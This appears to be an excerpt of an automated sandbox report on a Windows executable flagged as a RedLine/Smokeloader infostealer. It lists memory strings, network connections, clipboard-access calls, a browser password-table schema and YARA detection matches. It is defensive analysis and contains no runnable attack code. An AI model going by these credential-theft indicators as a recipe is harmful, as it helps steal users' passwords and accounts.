Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steamp#&F
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: IzDjbVdHha.exe, 00000000.00000003.2463034561.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: IzDjbVdHha.exe, 00000000.00000003.2463034561.0000000003168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: IzDjbVdHha.exe, 00000000.00000003.2367940750.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49775 version: TLS 1.2

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004329C0

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004329C0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2561057689.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_00B77000	0_3_00B77000
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_00B7C950	0_3_00B7C950
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00408850	0_2_00408850
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004218A0	0_2_004218A0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00422190	0_2_00422190
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0040ACF0	0_2_0040ACF0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00437DF0	0_2_00437DF0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00409580	0_2_00409580
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00415799	0_2_00415799
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00423860	0_2_00423860
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00438810	0_2_00438810
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041682D	0_2_0041682D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004288CB	0_2_004288CB
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D880	0_2_0043D880
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00430940	0_2_00430940
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00403970	0_2_00403970
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00420939	0_2_00420939
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004179C1	0_2_004179C1
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004231C2	0_2_004231C2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004241C0	0_2_004241C0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043B1D0	0_2_0043B1D0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004291DD	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D980	0_2_0043D980
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00405990	0_2_00405990
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D997	0_2_0043D997
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D999	0_2_0043D999
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004091B0	0_2_004091B0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042CA49	0_2_0042CA49
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042DA53	0_2_0042DA53
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00416263	0_2_00416263
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0040EA10	0_2_0040EA10
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00415220	0_2_00415220
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042CAD0	0_2_0042CAD0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004252DD	0_2_004252DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041B2E0	0_2_0041B2E0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00406280	0_2_00406280
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043DA80	0_2_0043DA80
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041E290	0_2_0041E290
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041CB40	0_2_0041CB40
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D34D	0_2_0043D34D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00426B50	0_2_00426B50
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043DB60	0_2_0043DB60
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00436B08	0_2_00436B08
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042830D	0_2_0042830D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042CB11	0_2_0042CB11
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00404320	0_2_00404320
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042CB22	0_2_0042CB22
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00425327	0_2_00425327
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00408330	0_2_00408330
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043F330	0_2_0043F330
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042A33F	0_2_0042A33F
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0040DBD9	0_2_0040DBD9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00424380	0_2_00424380
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041FC75	0_2_0041FC75
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041DC00	0_2_0041DC00
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00429C2B	0_2_00429C2B
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004291DD	0_2_004291DD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004074F0	0_2_004074F0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041148F	0_2_0041148F
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042AC90	0_2_0042AC90
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043ECA0	0_2_0043ECA0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0040CD46	0_2_0040CD46
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00437500	0_2_00437500
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00422510	0_2_00422510
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00417DEE	0_2_00417DEE
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041759F	0_2_0041759F
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00425E70	0_2_00425E70
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00436E74	0_2_00436E74
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00427603	0_2_00427603
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00425E30	0_2_00425E30
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004286C0	0_2_004286C0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043AEC0	0_2_0043AEC0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004266D0	0_2_004266D0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004236E2	0_2_004236E2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00405EE0	0_2_00405EE0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041DE80	0_2_0041DE80
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00402F50	0_2_00402F50
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00420F50	0_2_00420F50
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00438F59	0_2_00438F59
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00406710	0_2_00406710
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00423F20	0_2_00423F20
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043F720	0_2_0043F720
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00419F30	0_2_00419F30
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0041E7C0	0_2_0041E7C0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004197C2	0_2_004197C2
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0042DFE9	0_2_0042DFE9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0040A780	0_2_0040A780
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00411F90	0_2_00411F90
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00418792	0_2_00418792
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043EFB0	0_2_0043EFB0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A060D7	0_2_00A060D7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FE0E7	0_2_009FE0E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A170DB	0_2_00A170DB
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009F8055	0_2_009F8055
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A18057	0_2_00A18057
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FA197	0_2_009FA197
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A011B7	0_2_00A011B7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009F21F7	0_2_009F21F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1B127	0_2_00A1B127
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A03166	0_2_00A03166
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E6147	0_2_009E6147
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FD230	0_2_009FD230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1F217	0_2_00A1F217
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A0E250	0_2_00A0E250
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A023F7	0_2_00A023F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FE4F7	0_2_009FE4F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E64E7	0_2_009E64E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E9417	0_2_009E9417
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A09444	0_2_00A09444
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E8597	0_2_009E8597
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1D5B4	0_2_00A1D5B4
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E4587	0_2_009E4587
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1F597	0_2_00A1F597
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A0351D	0_2_00A0351D
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FB547	0_2_009FB547
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A04687	0_2_00A04687
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A05694	0_2_00A05694
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009F16F6	0_2_009F16F6
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E97E7	0_2_009E97E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A17767	0_2_00A17767
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E7757	0_2_009E7757
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A02777	0_2_00A02777
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009F7806	0_2_009F7806
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1F987	0_2_00A1F987
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009EA9E7	0_2_009EA9E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A08927	0_2_00A08927
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A06937	0_2_00A06937
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E6977	0_2_009E6977
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E8AB7	0_2_009E8AB7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009F9A29	0_2_009F9A29
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009FEA27	0_2_009FEA27
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A18A77	0_2_00A18A77
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A00BA0	0_2_00A00BA0
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A10BA7	0_2_00A10BA7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_009E3BD7	0_2_009E3BD7

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: String function: 00414400 appears 65 times
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: String function: 009E8297 appears 52 times
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: String function: 009F4667 appears 52 times

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1820

Source: IzDjbVdHha.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2561057689.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: IzDjbVdHha.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@11/2

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00437DF0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4344

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\72f1be93-7536-46bf-9d91-4fe37809be85

Jump to behavior

Source: IzDjbVdHha.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IzDjbVdHha.exe, 00000000.00000003.2400831128.000000000314A000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400415470.0000000003169000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2431252155.0000000003349000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: IzDjbVdHha.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

File read: C:\Users\user\Desktop\IzDjbVdHha.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IzDjbVdHha.exe "C:\Users\user\Desktop\IzDjbVdHha.exe"
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1820

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ntasn1.dll	Jump to behavior
